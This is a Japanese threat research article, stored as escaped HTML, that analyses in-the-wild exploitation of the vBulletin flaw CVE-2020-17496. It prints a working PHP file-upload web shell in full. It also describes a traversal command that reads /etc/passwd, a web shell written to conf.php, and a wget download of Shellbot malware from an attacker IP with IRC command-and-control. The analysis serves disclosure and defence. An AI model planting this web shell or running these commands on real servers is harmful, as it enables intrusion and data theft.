\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002
\u56f3 11 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 1<\/figcaption><\/figure>\n
\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e2\u756a\u76ee\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002
\u56f3 12. \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 2<\/figcaption><\/figure>\n
\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e3\u756a\u76ee\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002
\u56f3 13 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 3<\/figcaption><\/figure>\n
\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u95a2\u9023\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e4\u756a\u76ee\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3059\u3002\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30bd\u30fc\u30b9IP\u304c\u8907\u6570\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6d3b\u52d5\u3067\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3001\u305d\u308c\u3089\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002
\u56f3 14 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 4<\/figcaption><\/figure>\n
\u6a5f\u5fae\u306a\u30d5\u30a1\u30a4\u30eb\u306e\u8aad\u307f\u53d6\u308a<\/span><\/h4>\n
\u4e00\u90e8\u306e\u653b\u6483\u8005\u306f\u3001\u3053\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u3066\u30b5\u30fc\u30d0\u30fc\u5074\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u8aad\u307f\u53d6\u308d\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306fPHP\u95a2\u6570shell_exec()<\/span>\u304c\u542b\u307e\u308c\u3066\u3044\u3066\u3001\u3053\u308c\u304c\u4efb\u610f\u306e\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9 cat ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/span>\u00a0\u306f\/etc\/passwd<\/span>\u306e\u5185\u5bb9\u3092\u8aad\u307f\u53d6\u308a\u307e\u3059\u3002\u3053\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u56f315\u306b\u793a\u3057\u307e\u3059\u3002\u653b\u6483\u304c\u6210\u529f\u3059\u308b\u3068\u3001\u30bf\u30fc\u30b2\u30c3\u30c8\u304b\u3089\u306e\u6a5f\u5bc6\u60c5\u5831\u304c\u6f0f\u3048\u3044\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n
\"\u3053\u306eCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u95a2\u9023\u306e\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u7528\u306ePHP\u95a2\u6570shell_exec()\u3092\u542b\u3080\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002
\u56f3 15 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 5<\/figcaption><\/figure>\n
Web\u30b7\u30a7\u30eb\u306e\u4f5c\u6210<\/span><\/h4>\n
\u4e00\u90e8\u306e\u653b\u6483\u8005\u306f\u3053\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u3066Web\u30b7\u30a7\u30eb\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002<\/p>\n
\u56f316\u306f\u3001PHP\u95a2\u6570file_put_content()<\/span>\u3092\u4f7f\u3044\u3001web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u4e0a\u306e\u30d5\u30a1\u30a4\u30eb\u3001conf.php\u5185\u306b\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cPHP\u30d9\u30fc\u30b9\u306eWeb\u30b7\u30a7\u30eb\u3092\u4f5c\u6210\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u304c\u6210\u529f\u3059\u308b\u3068\u3001\u653b\u6483\u8005\u306f\u30d1\u30e9\u30e1\u30fc\u30bfx<\/span>\u3092\u6307\u5b9a\u3057\u305fHTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u4ecb\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092Web\u30b7\u30a7\u30eb\u306b\u9001\u4fe1\u3057\u3001\u30b5\u30fc\u30d0\u30fc\u30b5\u30a4\u30c9\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n
\"\u3053\u308c\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cPHP\u30d9\u30fc\u30b9\u306eWeb\u30b7\u30a7\u30eb\u3092Web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306econf.php\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3082\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u304c\u6210\u529f\u3059\u308b\u3068\u3001\u653b\u6483\u8005\u306f\u30d1\u30e9\u30e1\u30fc\u30bfx\u3092\u6307\u5b9a\u3057\u305fHTTP
\u56f3 16 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 6<\/figcaption><\/figure>\n
<\/a> \u56f317\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u88ab\u5bb3\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u306bPHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002web\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306f\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3001\u3053\u306e\u30b3\u30fc\u30c9\u306b\u3088\u308a\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u7528\u30da\u30fc\u30b8\u304c\u63d0\u4f9b\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u3092\u4f7f\u3063\u3066\u653b\u6483\u8005\u306f\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3001\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u30d5\u30a9\u30ed\u30fc\u30a2\u30c3\u30d7\u51e6\u7406\u3092\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002<\/p>\n
<?php\r\n\r\nerror_reporting(0);\r\n\r\necho \"Jasmine<br>\";\r\n\r\necho\"<font color=#ff0000>\".php_uname().\"\";\r\n\r\nprint \"\\n\";$disable_functions = @ini_get(\"disable_functions\");\r\n\r\necho \"<br>DisablePHP=\".$disable_functions; print \"\\n\";\r\n\r\necho\"<br><form method=post enctype=multipart\/form-data>\";\r\n\r\necho\"<input type=file name=f><input name=k type=submit id=k value=upload><br>\";\r\n\r\nif($_POST[\"k\"]==upload){\r\n\r\nif(@copy($_FILES[\"f\"][\"tmp_name\"],$_FILES[\"f\"][\"name\"])){\r\n\r\necho\"<b>\".$_FILES[\"f\"][\"name\"];\r\n\r\n}else{\r\n\r\necho\"<b>Gagal upload cok\";\r\n\r\n}\r\n\r\n}\r\n\r\n?><\/pre>\n
 <\/p>\n
\"\u3053\u308c\u306fCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u88ab\u5bb3\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u306bPHP\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3088\u3046\u3068\u3059\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002
\u56f3 17 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 7<\/figcaption><\/figure>\n
<\/a> \u56f318\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cbase64\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3092Web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3082\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u65b0\u3057\u3044\u30da\u30fc\u30b8\u304c\u4efb\u610f\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u5165\u53e3\u3068\u306a\u308a\u3001\u653b\u6483\u8005\u304c\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u30d5\u30a9\u30ed\u30fc\u30a2\u30c3\u30d7\u51e6\u7406\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n
\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304cbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3092Web\u30db\u30b9\u30c8\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3082\u3046\u3068\u3057\u3066\u3044\u308b\u69d8\u5b50\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002
\u56f3 18 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 8<\/figcaption><\/figure>\n
Shellbot\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9<\/span><\/h4>\n
\u4e00\u90e8\u306e\u653b\u6483\u8005\u306f\u3053\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3057\u3066PHP\u95a2\u6570shell_exec()<\/span>\u3067\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9wget<\/span>\u3092\u5b9f\u884c\u3057\u3001 http:\/\/178[.]170[.]117[.]50\/bot1<\/span> \u3068\u3044\u3046\u30a2\u30c9\u30ec\u30b9\u304b\u3089Perl\u30d9\u30fc\u30b9\u306e\u30b9\u30af\u30ea\u30d7\u30c8 \u30de\u30eb\u30a6\u30a7\u30a2\uff08Shellbot\uff09\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u5b9f\u884c\u3057\u3066\u3044\u307e\u3059\u3002\u305d\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u56f319\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n
\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u793a\u3057\u3066\u3044\u307e\u3059\"
\u56f3 19 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 9<\/figcaption><\/figure>\n
\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u5b9f\u884c\u3055\u308c\u308b\u3068\u300166[.]7[.]149[.]161:6667<\/span>\u3068\u3044\u3046\u30a2\u30c9\u30ec\u30b9\u3067IRC\u30d9\u30fc\u30b9\u306e\u30b3\u30de\u30f3\u30c9&\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\uff08C2\uff09\u30b5\u30fc\u30d0\u30fc\u306b\u63a5\u7d9a\u3057\u3001IRC\u30c1\u30e3\u30cd\u30eb#afk\u306b\u53c2\u52a0\u3057\u3066\u3001\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306ePING\u306b\u5fdc\u7b54\u3057\u7d9a\u3051\u307e\u3059\uff08\u56f320\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u53c2\u7167\uff09\u3002\u30c1\u30e3\u30c3\u30c8\u30c1\u30e3\u30cd\u30eb\u304b\u3089\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3059\u308b\u3068\u3001\u30dd\u30fc\u30c8\u30b9\u30ad\u30e3\u30f3\u306e\u95a2\u9023\u30b3\u30fc\u30c9\u306e\u5b9f\u884c\u3001\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3001\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c\u3001\u30d5\u30e9\u30c3\u30c9\u653b\u6483\u306e\u958b\u59cb\u3001\u653b\u6483\u8005\u3078\u306e\u30b7\u30a7\u30eb\u306e\u63d0\u4f9b\u306a\u3069\u3092\u884c\u3044\u307e\u3059\u3002<\/p>\n
\"\u524d\u56f3\u306e\u60aa\u610f\u306e\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u5b9f\u884c\u3055\u308c\u308b\u3068\u3001IRC\u30d9\u30fc\u30b9\u306e\u30b3\u30de\u30f3\u30c9&\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30b5\u30fc\u30d0\u30fc\u306b\u63a5\u7d9a\u3057\u3001IRC\u30c1\u30e3\u30cd\u30eb#afk\u306b\u53c2\u52a0\u3057\u3001\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306ePING\u306b\u5fdc\u7b54\u3057\u307e\u3059\uff08\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u53c2\u7167\uff09\u3002
\u56f3 20 ShellBot\u30b9\u30af\u30ea\u30d7\u30c8\u5b9f\u884c\u4e2d\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af<\/figcaption><\/figure>\n
Sora\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9<\/span><\/h4>\n
\u3042\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u653b\u6483\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089Mirai\u306e\u4e9c\u7a2e\uff08Sora\uff09\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u3053\u3068\u304c\u5224\u660e\u3057\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u9593\u9055\u3063\u305fHTTP\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u305f\u3081\u7121\u52b9\u3067\u3059\u3002<\/p>\n
\"\u3053\u306eCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u653b\u6483\u8005\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089Mirai\u306e\u4e9c\u7a2e\uff08Sora\uff09\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002
\u56f3 21 \u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 10<\/figcaption><\/figure>\n
\u3053\u308c\u3089\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u5206\u6790\u3057\u305f\u7d50\u679c\u3001\u3053\u308c\u3089\u306f\u3055\u307e\u3056\u307e\u306a\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u62e1\u6563\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u305f\u3068\u3048\u3070CVE-2020-5902<\/a>\uff08\u3053\u306e\u5834\u5408\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306fbash\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u3067\u7121\u52b9\u3002\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u633f\u5165\u3055\u308c\u308b\u30b3\u30de\u30f3\u30c9\u304c\u7279\u5b9aCLI\u4e92\u63db\u30b3\u30de\u30f3\u30c9\u3067\u306a\u3051\u308c\u3070\u306a\u3089\u306a\u3044\uff09\u3001CVE-2020-1937<\/a>\u3001 CVE-2020-10173<\/a>\u3001 CVE-2020-10987<\/a>\u3001Netgear R700\u306e\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027\u3001Netlink GPON\u30eb\u30fc\u30bf\u30fc1.0.11\u306e\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027\u3001\u305d\u3057\u3066\u672c\u7a3f\u3067\u8aac\u660e\u3057\u305f\u8106\u5f31\u6027CVE-2020-17496\u306a\u3069\u3067\u3059\u3002<\/p>\n
\u7d50\u8ad6<\/strong><\/h2>\n
\u5f0a\u793e\u306e\u8105\u5a01\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0\u3067\u306f\u3001vBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2020-17496\u306b\u5bfe\u3059\u308b\u3055\u307e\u3056\u307e\u306a\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u8a66\u307f\u304c\u691c\u51fa\u3055\u308c\u3066\u3044\u307e\u3059\u3002vBulletin\u306f\u30de\u30fc\u30b1\u30c3\u30c8\u3067\u9577\u5e74\u5b9f\u884c\u3055\u308c\u3001\u5229\u7528\u8005\u6570\u306e\u591a\u3044\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30d1\u30c3\u30b1\u30fc\u30b8\u3067\u3042\u308b\u3053\u3068\u304b\u3089\u3001\u653b\u6483\u8005\u306b\u3068\u3063\u3066\u8cb4\u91cd\u306a\u30bf\u30fc\u30b2\u30c3\u30c8\u3068\u8a8d\u8b58\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n
vBulletin\u306f\u30012020\u5e748\u670810\u65e5\u306e\u30d1\u30c3\u30c1<\/a>\u3067\u672c\u8106\u5f31\u6027\u3092\u4fee\u6b63\u6e08\u307f\u3067\u3059\u3002\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u3042\u3052\u308b\u3053\u3068\u3067\u30ea\u30b9\u30af\u306f\u8efd\u6e1b\u3055\u308c\u307e\u3059\u306e\u3067\u3001\u305c\u3072\u672c\u30d1\u30c3\u30c1\u3092\u9069\u7528\u3059\u308b\u3053\u3068\u3092\u5f37\u304f\u304a\u52e7\u3081\u3057\u307e\u3059\u3002<\/p>\n
\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u88fd\u54c1\u3092\u3054\u5229\u7528\u4e2d\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u5404\u30b5\u30fc\u30d3\u30b9\u3001\u88fd\u54c1\u306b\u3088\u3063\u3066\u3053\u306e\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n